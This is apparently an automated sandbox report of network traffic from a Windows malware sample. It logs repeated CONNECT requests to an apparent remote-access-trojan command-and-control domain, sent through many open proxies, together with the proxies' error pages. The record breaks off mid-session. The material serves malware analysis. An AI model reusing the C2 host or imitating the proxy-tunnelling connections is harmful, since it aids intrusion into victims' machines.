                                              324192.168.2.44998346.100.106.24260307284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.341967106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.016539097 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              325192.168.2.45097089.46.249.14888887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.344062090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.625039101 CET39INHTTP/1.0 200 Connection established
                                              Mar 11, 2024 08:37:19.625536919 CET253INHTTP/1.0 500 Internal Error
                                              Connection: close
                                              Content-type: text/html; charset=utf-8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 45 72 72 6f 72 3c 2f 68 32 3e 3c 68 33 3e 49 6e 74 65 72 6e 61 6c 20 70 72 6f 78 79 20 65 72 72 6f 72 20 64 75 72 69 6e 67 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>500 Internal Error</title></head><body><h2>500 Internal Error</h2><h3>Internal proxy error during processing your request</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              326192.168.2.450021194.31.79.75509207284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.346100092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.366358995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367399931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366525888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.366432905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.366211891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.366358042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.382134914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:18.382050991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              327192.168.2.450938178.128.113.118231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.348637104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.692282915 CET1286INHTTP/1.1 502 Bad Gateway
                                              Server: squid
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3693
                                              X-Squid-Error: ERR_CONNECT_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              328192.168.2.45101638.162.25.6231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.354020119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.306299925 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              329192.168.2.45095547.106.76.19680887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.362646103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.700658083 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              330192.168.2.45090949.228.131.16950007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.368616104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.741930008 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              331192.168.2.45007834.79.91.3590407284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.370388031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.422914028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435496092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.554011106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              332192.168.2.450989173.249.29.24391237284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.371840954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.684515953 CET536INHTTP/1.1 503 Service Unavailable
                                              Server: squid/3.5.27
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3832
                                              X-Squid-Error: ERR_DNS_FAIL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              333192.168.2.450272134.209.29.12031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.379584074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.941330910 CET28INHTTP/1.1 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              334192.168.2.450138184.181.217.19441457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.389273882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              335192.168.2.45097685.143.213.290507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.390346050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.728648901 CET755INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 6f 72 20 69 73 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 54 6f 72 20 61 73 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 6f 72 20 69 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 21 2d 2d 20 50 6c 75 73 20 74 68 69 73 20 63 6f 6d 6d 65 6e 74 2c 20 74 6f 20 6d 61 6b 65 20 74 68 65 20 62 6f 64 79 20 72 65 73 70 6f 6e 73 65 20 6d 6f 72 65 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 73 6f 20 20 20 20 20 20 49 45 20 77 69 6c 6c 20 62 65 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 70 6c 61 79 20 69 74 2e 20 43 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 20 20 20 20 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 20 63 6f 6d 6d 65 6e 74 2e 2d 2d 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>Tor is not an HTTP Proxy</title></head><body><h1>Tor is not an HTTP Proxy</h1><p>It appears you have configured your web browser to use Tor as an HTTP proxy.This is not correct: Tor is a SOCKS proxy, not an HTTP proxy.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.... Plus this comment, to make the body response more than 512 bytes, so IE will be willing to display it. Comment comment comment comment comment comment comment comment comment comment comment comment.--></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              336192.168.2.450971128.199.165.63490937284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.390377045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.084925890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
